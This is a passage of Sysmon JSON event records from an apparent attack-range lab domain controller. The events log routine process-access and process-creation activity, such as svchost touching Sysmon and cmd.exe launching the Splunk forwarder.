C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1673,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1674,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1675,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1676,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1677,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001031620300}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001031620300}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1678,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.282\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nProcessId: 3864\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-001031620300}\r\nParentProcessId: 3852\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.282","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-001031620300}","ParentProcessId":"3852","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1679,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001031620300}\r\nSourceProcessId: 3852\r\nSourceThreadId: 3856\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001031620300}","SourceProcessId":"3852","SourceThreadId":"3856","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","TargetProcessId":"3864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1680,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","TargetProcessId":"3864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1681,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 